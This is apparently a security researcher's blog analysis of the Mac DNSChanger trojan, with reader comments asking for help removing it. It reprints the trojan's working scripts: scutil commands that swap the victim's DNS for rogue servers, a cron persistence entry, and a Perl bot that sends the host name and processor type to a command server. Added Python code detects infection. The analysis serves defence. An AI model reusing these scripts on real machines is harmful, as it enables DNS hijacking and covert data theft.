
Analysis of OSX Trojan DNS Changer

::::::::::::
File Size
::::::::::::

DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)


:::::::::::::::::
Propagation
:::::::::::::::::
This malicious code does not spread or propagate by itself. It uses an old yet effective social engineering technique to entice users to install the program manually. The trojan disguises itself as a video codec and attaches itself to shared, free video downloads. It was first seen on and linked from porn sites, but later it was also linked from funny-video pages and seen on splogs (spam blogs).

Is this in the wild? Yes.

::::::::::::::::::::::::::::::::::
Installation & Behaviour
::::::::::::::::::::::::::::::::::
A user visits a rogue site and downloads a fake video codec. Check the screenshot here.


The disk image file is mounted automatically but not extracted, which means the user has to install the downloaded package manually.


The downloaded installer, Install.pkg, contains the following files:



Info.plist is the first file read during installation. It contains detailed package information and behavior settings such as:

Brief description: Microsoft Company
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart


It is followed by Archive.bom, which contains the list of files to install:

lsbom -s install.pkg/Contents/Archive.bom
.
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak
./Mozillaplug.plugin/Contents/version.plist
./QuickTime.xpt
./plugins.settings
./sendreq


It then accesses the files description.plist and PkgInfo, which give the following information:

Version: 1.0
Description:
“Its a suppa puppa desc yo”
Title: MacCodec

PkgInfo: pmkrpkg1

This is followed by BundleVersions.plist for version information.

The installer comes with a "License Agreement". Upon clicking "Continue", a message box is displayed requiring the user to click "Agree" to continue the installation process.


Now let's look further at the malicious code.

Archive.pax.gz, postinstall, postupgrade, preinstall and preupgrade contain the shell scripts that do the dirty work.


Postinstall and postupgrade contain exactly the same code, as do preinstall and preupgrade.

Preinstall is invoked after the user agrees to the License Agreement. This trojan has no damaging payload; it only modifies the user's DNS settings. Let's check the code.

:::::::::::::::::::::::
Code Analysis
:::::::::::::::::::::::


Preinstall script:

#!/bin/bash
s1=85.255.115.22
s2=85.255.112.190
path="/Library/Internet Plug-Ins"
# Ask scutil for the PrimaryService ID; the scutil commands are fed through a here-document
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<<EOF


Using scutil, it retrieves the ID of the user's primary network service (PrimaryService):

open
get State:/Network/Global/IPv4
d.show
quit
EOF
)

It then sets the DNS name servers of that service to s1=85.255.115.22 and s2=85.255.112.190:

/usr/sbin/scutil <<EOF
open
d.init
d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS
quit
EOF

Take note: IP addresses may change per variant.

It checks the crontab for an entry referencing plugins.settings, located in "/Library/Internet Plug-Ins". This file is a marker: it indicates whether the trojan has been installed before.

exist=`crontab -l|grep plugins.settings`

If plugins.settings is not referenced (meaning the trojan was not yet installed), the installation proceeds by dropping a temporary file, cron.inst:

if [ "$exist" == "" ]; then
echo "* * * * * \"$path/plugins.settings\">/dev/null 2>&1" > cron.inst


Cron.inst has the following strings:

* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1


It then installs cron.inst as the user's crontab with the crontab command:

crontab cron.inst

The cron entry runs another script, QuickTime.xpt, every minute. It is found in /Library/Internet Plug-Ins/:

"/Library/Internet Plug-Ins/QuickTime.xpt"

In the background, it will create a temporary file named 1:

>/dev/null 2>&1

QuickTime.xpt redirects its output there instead of showing errors or script output on the user's screen.


Once cron.inst has been installed, the preinstall script deletes this temporary file:

rm -rf cron.inst
fi

QuickTime.xpt script:

This script is inside Archive.pax.gz. The installation ends by executing cron.inst, which extracts its content to /Library/Internet Plug-Ins/.

Like the preinstall script, QuickTime.xpt checks the user's network information, attempts to modify the DNS name server settings, checks for the existence of QuickTime.xpt and, if it exists, creates cron.inst, executes it and deletes the temporary file, 1.
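The persistence mechanism described above leaves two artefacts an analyst can check without running anything from the package: a crontab entry that points into /Library/Internet Plug-Ins, and a changed DNS server list. The following triage script is an added example and is not part of the original post or of the malware; it parses the text output of `sudo crontab -l` and `scutil --dns` (both samples below are constructed in the shape of that output, with a made-up router address) and reports any entry referencing the marker files or any of the rogue name servers named in this post and its comments. The function names are mine; the indicator list is only a starting point, since the post notes that the addresses change per variant.

```python
import json
import re

# Addresses listed in the analysis and in reader comments; they change per variant.
ROGUE_DNS_SERVERS = {"85.255.115.22", "85.255.112.190", "85.255.113.126", "85.255.112.227"}
PLUGIN_DIR = "/Library/Internet Plug-Ins"
MARKER_FILES = ("plugins.settings", "QuickTime.xpt")

# Constructed sample of `crontab -l` output containing the entry shown in the post.
SAMPLE_CRONTAB = '''# m h dom mon dow command
0 3 * * 1 /usr/bin/periodic weekly
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1
'''

# Constructed sample in the shape of `scutil --dns` output: one rogue server, one router.
SAMPLE_SCUTIL_DNS = '''DNS configuration

resolver #1
  nameserver[0] : 85.255.115.22
  nameserver[1] : 192.168.1.1
  order   : 200000
'''

# Five schedule fields, then the command.
CRON_LINE_RE = re.compile(r"^\s*(\S+\s+){5}(?P<cmd>.*)$")
NAMESERVER_RE = re.compile(r"nameserver\[\d+\]\s*:\s*(\S+)")


def suspicious_cron_entries(crontab_text):
    """Return the commands of crontab lines that reference the plug-in directory or marker files."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        match = CRON_LINE_RE.match(line)
        cmd = match.group("cmd") if match else line
        if PLUGIN_DIR in cmd or any(name in cmd for name in MARKER_FILES):
            hits.append(cmd.strip())
    return hits


def configured_nameservers(scutil_dns_text):
    """Extract the configured name servers from `scutil --dns` output, in order, without duplicates."""
    servers = []
    for ip in NAMESERVER_RE.findall(scutil_dns_text):
        if ip not in servers:
            servers.append(ip)
    return servers


def rogue_nameservers(scutil_dns_text):
    """Return only the name servers that match the known rogue addresses."""
    return [ip for ip in configured_nameservers(scutil_dns_text) if ip in ROGUE_DNS_SERVERS]


def triage(crontab_text, scutil_dns_text):
    """Combine both checks into a single verdict; either artefact alone is enough to flag the host."""
    cron = suspicious_cron_entries(crontab_text)
    rogue = rogue_nameservers(scutil_dns_text)
    return {"cron_entries": cron, "rogue_dns": rogue, "infected": bool(cron or rogue)}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_CRONTAB, SAMPLE_SCUTIL_DNS), indent=2))
```

On a live host the two inputs would come from `sudo crontab -l` (the root crontab, as one commenter found) and `scutil --dns`; a clean host produces an empty `cron_entries` list and `infected: false`, while a name server outside the rogue set but still unexpected is worth a second look even though this script does not flag it.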

Postinstall script:

#!/bin/sh
path="/Library/Internet Plug-Ins/"
/usr/bin/perl "$path/sendreq"
rm -rf "$path/sendreq"

It executes sendreq, a Perl script, and then deletes it.

SendReq Script:

This Perl-based bot acts as a backdoor client component and communicates with a remote server over a socket.

#!/usr/bin/perl
use IO::Socket;

It uses MIME Base64 encoding to transmit its message over HTTP:

# Pure-Perl base64 encoder (same algorithm as MIME::Base64's encode_base64):
# uuencode the data with pack("u"), then remap the uuencode alphabet to base64.
sub encode_base64 {
    use integer;
    my $eol = $_[1];
    $eol = "\n" unless defined $eol;

    my $res = pack("u", $_[0]);
    # Remove first character of each line, remove newlines
    $res =~ s/^.//mg;
    $res =~ s/\n//g;

    $res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
    # fix padding at the end
    my $padding = (3 - length($_[0]) % 3) % 3;
    $res =~ s/.{$padding}$/'=' x $padding/e if $padding;
    # break encoded string into lines of no more than 76 characters each
    if (length $eol) {
        $res =~ s/(.{1,76})/$1$eol/g;
    }
    return $res;
}


The bot command-and-control server:

my $server="85.255.121.37";

Take note: IP addresses may change per variant.

It executes uname -p to retrieve the victim's processor type, and hostname to retrieve the host name:

# Command substitution: processor type, a ";" separator, then the host name
my $cmd=`uname -p;echo ";";hostname`;$cmd=~s/\n//g;


It encodes the gathered information, prefixed with "mac":

my $uniqid=encode_base64("mac;".$cmd); $uniqid=~s/\n//g;


It builds a request for the remote server, carrying the encoded string in the Accept-Language header:

my $request="GET / HTTP/1.1\r\nAccept-Language: $uniqid\r\nHost: $server\r\n\r\n";


The bot then connects to the remote server over TCP port 80 and sends the request:

my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>"tcp",timeout=>10) or die();
print $socket $request;
close($socket);


Captured packet looks like this:


It sends the victim's information as a base64-encoded string:

GET / HTTP/1.1 Accept-Language: bWFjO2kzODY7cGMtdG9vbHNzLW1hY2Jvb2stcHJvLTE1LmxvY2Fsx Host: 85.255.121.37


Decoded version:

GET / HTTP/1.1 Accept-Language: mac;i386;xx-toolss-macbook-pro-15.local Host: 85.255.121.37

From this information, the C&C (command-and-control) server can determine the total infection count, the IP address and the geographical location of each infected host.
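The check-in shown above is recognisable on the wire because a real Accept-Language header carries language tags such as en-US,en;q=0.9, not a base64 blob. The decoder below is an added example, not code from the original post or from the bot: it parses a raw HTTP request, base64-decodes the Accept-Language value, and returns the three fields (platform tag, processor type, host name) together with the Host header when the value has the mac;arch;hostname shape the post describes, and returns None otherwise. The two sample requests are constructed for the example; the host name and architecture in them are made up.

```python
import base64
import binascii

# Constructed beacon in the shape the post describes: base64("mac;<uname -p>;<hostname>")
# in the Accept-Language header, sent to the C&C address named in the post.
SAMPLE_BEACON = (
    "GET / HTTP/1.1\r\n"
    "Accept-Language: "
    + base64.b64encode(b"mac;i386;example-macbook.local").decode("ascii")
    + "\r\n"
    "Host: 85.255.121.37\r\n"
    "\r\n"
)

# Constructed benign request: a browser sends a list of language tags here.
SAMPLE_BENIGN = (
    "GET / HTTP/1.1\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
)


def parse_headers(raw_request):
    """Return the request headers as a dict keyed by lowercase header name."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def decode_beacon(raw_request):
    """Decode a DNSChanger-style check-in, or return None for anything else.

    The bot strips newlines from the encoded string but keeps the '=' padding;
    padding is re-added defensively so a truncated capture still decodes.
    """
    headers = parse_headers(raw_request)
    value = headers.get("accept-language")
    if not value:
        return None
    padded = value + "=" * (-len(value) % 4)
    try:
        # validate=True rejects the ',', '-' and '=' found inside genuine language tags
        decoded = base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    parts = decoded.split(";")
    if len(parts) != 3 or parts[0] != "mac" or not decoded.isprintable():
        return None
    return {
        "platform": parts[0],
        "arch": parts[1],
        "hostname": parts[2],
        "c2": headers.get("host"),
    }


if __name__ == "__main__":
    print(decode_beacon(SAMPLE_BEACON))
    print(decode_beacon(SAMPLE_BENIGN))
```

Run over captured HTTP requests, a non-None result identifies both the infected host (by the host name it reported) and the server it checked in to; the same three-field structure is what the post's decoded packet shows, with the host name anonymised.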

Furthermore, the scripts in later versions of this trojan are obfuscated, making it more difficult for security analysts and researchers to read the code.


::::::::::::::
Conclusion
::::::::::::::

Trojan DNSChanger is as simple as changing DNS settings: no complication and no destructive behavior. These are simple scripts, widely available online, built into a Mac installer and deployed to several existing fake codec domains.

The lesson here is that malware or threats on the Mac do not have to be complicated. With the vast amount of information available online, an ordinary person without a programming background, also called a script kiddie, can cause interruption and damage to our daily lives.

  1. Anonymous Coward
    August 25, 2008 at 10:59 pm

    I fell for this trojan, too. I have ClamXav running on my Mac, and it didn’t catch it. When it installed, it added the DNS addresses you listed, but it faded them out, too. As a result, I couldn’t change or delete them. Following your analysis, I went to /Library/Internet Plug-Ins/ and removed plugins.settings, QuickTime.xpt, and Mozillaplug.plugin. (sendreq was nowhere to be found.) I then restarted my computer, and it restored the correct DNS addresses–because those are pulled from my home network’s router.

    I still have the original .dmg if you want it.

  2. mongo mcginty
    September 2, 2008 at 2:40 am

    I’ve recently spotted a variant that’s trying to talk to 64.28.188.220 and the C2 server.

  3. mongo mcginty
    September 2, 2008 at 2:41 am

    erh above should say “as the c2 server” (c2= command and control, fwiw)

  4. Frank
    September 22, 2008 at 11:40 am

    Was infected too. Bought a Mac because of all the crap I had on Windows machines…

  5. Methusela Cebrian Ferrer
    September 23, 2008 at 4:51 am

    Hi Frank, do you still have the URL where you downloaded the DMG ?

  6. mitch
    December 7, 2008 at 8:40 am

    I recently installed it by mistake, or I think that I did. I looked in Library/Internet Plug-Ins and couldn't find QuickTime.xpt or Mozillaplug.plugin. I checked DNS and did not see s1=85.255.115.22 and s2=85.255.112.190 or 64.28.188.220. Did I dodge a bullet? When I tried to install, it said installation failed. What should I look for? How do I know if it installed? How can I get rid of it if I have it?
    Thanks.

  7. Liane
    February 5, 2009 at 5:41 pm

    Just wondering…what can hackers do with your modified DNS settings? What do they really get out of it? In other words, what’s the real point to these trojans…

    • Methusela Cebrian Ferrer
      February 7, 2009 at 3:35 am

      I'm glad you asked this question.

      This is what we call a "DNS Pharming Attack". So malware like the DNSChanger trojan attempts to modify the user's DNS settings so that when the user types a valid URL they are redirected to a list of websites that belong to these attackers. As an effect, an innocent/infected user will think that he/she is visiting a valid website like, for example, Facebook.com, while instead it is loading a completely different page. Pharming gives an attacker the advantage of hijacking your browser and may cause disclosure of your private information and browsing behavior, direct you to exploit websites, push further malware, and push advertisements (so you'll find pop-ups coming out from time to time).

      From a common user's perspective, this attack doesn't seem harmful; however, this is where the attacker silently takes real advantage of the infection.

      I hope this provides you a clear understanding of this threat.

  8. February 10, 2009 at 4:13 pm

    Got the DNS Changer but a different type. The IP is 85.255.113.126 and 85.255.112.227

    Used terminal and “sudo crontab -l” and found:

    * * * * * “/Library/Internet Plug-Ins/QuickTime.xpt”>/dev/null 2>&1

    However, I can't remove it. I only get "localized rsrc" is using it and therefore I can't empty the trash.

    What to do?

    • Methusela Cebrian Ferrer
      February 11, 2009 at 10:20 am

      Hi Dr Alban, I hope my reply is not too late. To remove it, type "sudo crontab -r"; however, it would be better to do this without an internet connection. Also, don't forget to check your DNS settings and look for IP addresses starting with 85.xx.xx.xx and make sure you remove those entries.

      Let me know how it goes.

  9. trenton
    March 2, 2009 at 10:52 am

    I have the stupid wsearch.net thing and I looked for all the files that you say to remove and I tried to change the DNS, but it's still there. I don't know how to remove it. I have a Mac 10.4.11 and I have no clue how to make it stop. I have tried all the things and it seems to be getting worse, please help.

    • Methusela Cebrian Ferrer
      March 3, 2009 at 8:01 am

      Hi Trenton, Wsearch.net is not related to any malware … you might want to check this: http://ithreats.net/2008/09/21/wsearchnetunknown-is-it-new-dnschanger/

      One of the readers' comments:

      "This is a problem with SMC wireless routers/modems. I am an Internet Support Rep and have seen this problem with customers and described on other sites. The problem is that the default search domain on these routers is set to mygateway.net. Changing this to a legitimate search domain is a workaround for the problem, but I have seen no explanation for why the default search domain is set to this. It has been reported for more than one ISP so it is not something that just one ISP is doing."

  10. April 15, 2009 at 2:50 pm

    Not that I’m totally impressed, but this is a lot more than I expected for when I found a link on SU telling that the info is awesome. Thanks.

  11. Cleaner
    May 21, 2009 at 1:42 pm

    If someone still has the .dmg, could you please send it to me at antoinebis at gmail.com. I would like to test my program.

    Thanks !

  12. Eesha
    April 30, 2010 at 3:53 pm

    I have a Mac and I rebooted the whole thing and there is currently nothing sitting in my Internet Plug-Ins folder, and yet the virus is still there after I erased and reinstalled everything. Please help?
